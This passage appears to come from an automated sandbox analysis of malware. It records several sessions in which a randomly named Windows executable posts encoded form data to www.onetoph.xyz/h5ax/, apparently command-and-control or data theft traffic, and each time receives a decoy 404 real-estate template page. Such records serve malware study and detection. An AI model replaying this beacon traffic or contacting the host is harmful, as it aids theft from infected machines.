                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 31 74 4d 35 7a 36 72 63 37 65 72 6d 59 6e 62 66 56 6e 66 79 4e 51 66 4d 46 75 4f 35 6e 53 53 78 43 65 67 4c 31 32 72 6a 31 38 4d 67 65 53 48 4b 61 7a 7a 2f 38 63 6e 45 31 69 48 4c 44 54 71 45 63 65 67 65 35 2f 33 45 70 47 69 4b 65 77 4f 79 74 69 33 30 45 4e 7a 50 36 53 4c 44 58 72 6a 72 59 2f 30 4c 76 64 74 68 2b 7a 55 44 74 53 79 36 42 64 7a 33 54 62 4c 46 42 48 48 39 74 34 43 2f 49 77 64 76 76 43 53 65 57 58 68 4b 56 72 34 6f 6b 69 70 46 77 53 52 4e 4a 61 63 55 68 7a 59 6c 32 48 34 30 45 47 54 46 42 50 79 2b 43 69 51 66 66 46 39 33 34 67 3d 3d
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN1tM5z6rc7ermYnbfVnfyNQfMFuO5nSSxCegL12rj18MgeSHKazz/8cnE1iHLDTqEcege5/3EpGiKewOyti30ENzP6SLDXrjrY/0Lvdth+zUDtSy6Bdz3TbLFBHH9t4C/IwdvvCSeWXhKVr4okipFwSRNJacUhzYl2H40EGTFBPy+CiQffF934g==
                                              Sep 24, 2024 11:30:12.689295053 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:12 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:30:12.689409971 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:30:12.689428091 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
                                              Sep 24, 2024 11:30:12.689439058 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:30:12.689450979 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:30:12.689541101 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:30:12.689655066 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:30:12.689676046 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:30:12.689688921 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:30:12.689699888 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ
                                              Sep 24, 2024 11:30:12.689960957 CEST1246INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65
                                              Data Ascii: </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a> <a href=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.11.3049952209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:15.208142042 CEST778OUTPOST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 30 4e 63 35 78 5a 44 63 39 2b 72 6e 45 58 62 66 43 33 66 75 4e 52 6a 4d 46 73 69 70 6d 67 47 78 43 2f 51 4c 30 33 72 6a 32 38 4d 67 51 79 48 50 48 6a 79 53 38 63 36 35 31 6e 2f 4c 44 53 4f 45 63 65 51 65 2b 49 6a 44 37 47 69 4d 47 41 4f 77 70 69 33 30 45 4e 7a 50 36 53 65 6f 58 72 72 72 45 65 45 4c 39 76 56 69 68 44 55 4d 6e 79 79 36 46 64 7a 37 54 62 4c 6e 42 47 61 31 74 39 47 2f 49 79 46 76 68 78 4b 64 66 58 68 4d 52 72 35 38 71 79 67 54 37 68 70 65 4d 4e 73 54 6a 57 63 39 33 51 4a 75 5a 46 6e 48 53 76 4f 54 65 6a 39 33 64 48 38 73 6c 6e 46 46 62 51 69 46 52 31 66 58 70 4e 36 4b 53 62 2f 4d 47 76 51 3d
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmgGxC/QL03rj28MgQyHPHjyS8c651n/LDSOEceQe+IjD7GiMGAOwpi30ENzP6SeoXrrrEeEL9vVihDUMnyy6Fdz7TbLnBGa1t9G/IyFvhxKdfXhMRr58qygT7hpeMNsTjWc93QJuZFnHSvOTej93dH8slnFFbQiFR1fXpN6KSb/MGvQ=
                                              Sep 24, 2024 11:30:15.388524055 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:15 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:30:15.388540030 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:30:15.388638020 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
                                              Sep 24, 2024 11:30:15.388653994 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:30:15.388760090 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:30:15.388916016 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:30:15.388931036 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:30:15.388966084 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:30:15.389137983 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:30:15.389247894 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ
                                              Sep 24, 2024 11:30:15.389337063 CEST1246INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65
                                              Data Ascii: </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a> <a href=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.11.3049953209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:17.909603119 CEST2578OUTPOST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 30 4e 63 35 78 5a 44 63 39 2b 72 6e 45 58 62 66 43 33 66 75 4e 52 6a 4d 46 73 69 70 6d 67 2b 78 43 74 59 4c 31 55 44 6a 33 38 4d 67 59 53 48 4f 48 6a 79 71 38 63 69 39 31 6e 6a 78 44 51 47 45 54 63 59 65 2f 39 50 44 78 47 69 4d 50 67 4f 7a 74 69 33 68 45 4a 58 4c 36 53 4f 6f 58 72 72 72 45 64 63 4c 71 74 74 69 6a 44 55 44 74 53 79 32 42 64 7a 58 54 62 44 64 42 47 65 6c 74 37 79 2f 49 46 42 76 68 43 75 64 66 58 68 4d 57 72 35 68 71 79 38 57 37 68 68 4b 4d 49 49 70 67 69 63 39 31 32 51 52 47 46 72 4c 4a 38 4f 44 44 42 6c 4c 61 30 38 6b 67 6d 4e 56 56 32 79 6a 66 33 62 43 6f 59 7a 51 4b 4f 57 47 46 50 67 50 73 77 58 71 4a 45 61 6d 58 43 4c 4e 48 45 32 42 4f 46 53 55 46 51 54 4d 38 33 47 77 70 7a 62 53 78 68 38 52 73 41 38 69 69 46 63 6f 69 69 51 32 31 35 31 38 64 75 61 74 55 63 50 42 2b 51 67 43 43 4f 70 4d 41 42 45 4f 59 54 7a 70 67 4a 31 6f 66 32 4a 31 6d 32 6f 39 6e 65 39 70 79 4e 49 75 53 47 78 76 79 4d 2b 41 57 76 4e 59 6c 37 6b 6f 71 7a 4a 49 4e 79 [TRUNCATED]
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmg+xCtYL1UDj38MgYSHOHjyq8ci91njxDQGETcYe/9PDxGiMPgOzti3hEJXL6SOoXrrrEdcLqttijDUDtSy2BdzXTbDdBGelt7y/IFBvhCudfXhMWr5hqy8W7hhKMIIpgic912QRGFrLJ8ODDBlLa08kgmNVV2yjf3bCoYzQKOWGFPgPswXqJEamXCLNHE2BOFSUFQTM83GwpzbSxh8RsA8iiFcoiiQ21518duatUcPB+QgCCOpMABEOYTzpgJ1of2J1m2o9ne9pyNIuSGxvyM+AWvNYl7koqzJINyB7dKPDP4z2Rx0O611isl7s7PHjCvuG1jiuSWl/kLvSmaDAdG9Aamy2hl+7Jg0TpAVJ/IKQ049Au5YkzudhO1TZiT+qFBoz68Jresw1QN9RbouBxftRRLjQ2RklxOjm3g98HkXVFoHHykdURYleVmWJyYCAYQPL5W89tBZPbb/jKyYdYdvWxwJewKleGsREdjtCD8pT1t4zTM/2A57/FrSJVbwnXCbiYRY/2zSM32t91DzhJDTQqwfIrW4Vo2oTsSsSVg9pMeW0SbcCR+SpRP4VVlG0Qe9wh1uMwWOOrmKLW3EbIaoxqvcdEta4F4sPXTVmrFV4R8ZcjHe+wpkjKUml09ZkcoQ1Foh5oAMsq2ndcL+vuueVQgAPqaN+oxcHhROEI0H9jRwMRKJtpoef6kdIVlGkROg3EYnKyFabvUHCfZQEEU1gc7vKLWjGu+hRBpZQKT7j2KZeC7M8KYc5+KN2jEMFiFcT1utQckzQPFUi5GSIk9o/uc3SHysLW2vib48Q/2sBFo35+/6ZNiUDk26bytwIOppnbwR5A2BIYcJkaJkUoWZNPY1eZDKfuV+JraszxUWelSetpCN8Y2nPO4NngHenlk8Ibj9K3WenYjMfH6P5YhpL4YY0s8FLbxZ77rTy7/3s6gVyCAlrdANdS94+FqYXFqqO+rRf [TRUNCATED]
                                              Sep 24, 2024 11:30:17.909621954 CEST1317OUTData Raw: 64 46 35 72 4a 46 34 73 6b 42 64 66 6c 6d 38 48 50 74 74 64 57 2b 47 69 49 43 4d 74 69 42 35 73 51 38 73 75 47 79 36 4d 47 4c 37 6e 68 74 37 66 49 37 62 56 71 74 78 6c 38 56 39 6a 71 54 6b 46 74 38 58 4e 62 4d 50 57 66 4e 52 6d 73 46 6d 2b 54 58
                                              Data Ascii: dF5rJF4skBdflm8HPttdW+GiICMtiB5sQ8suGy6MGL7nht7fI7bVqtxl8V9jqTkFt8XNbMPWfNRmsFm+TXhAg+jZFbONKs6sXoIJYW1Jp0icCMlJM18T9sz1rj/lTh26kn0TWnTOwm5PyyNWr3bY1nzTi7NH0hwWGlj/Is0rf6CpKlb3xXNcR8CTykM1H+JPWYs2EcfW2DHe2XrZfiGFtdKgaTdOqYjF6FKCu8VjcDrkUN7B4iM
                                              Sep 24, 2024 11:30:18.089972973 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:17 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
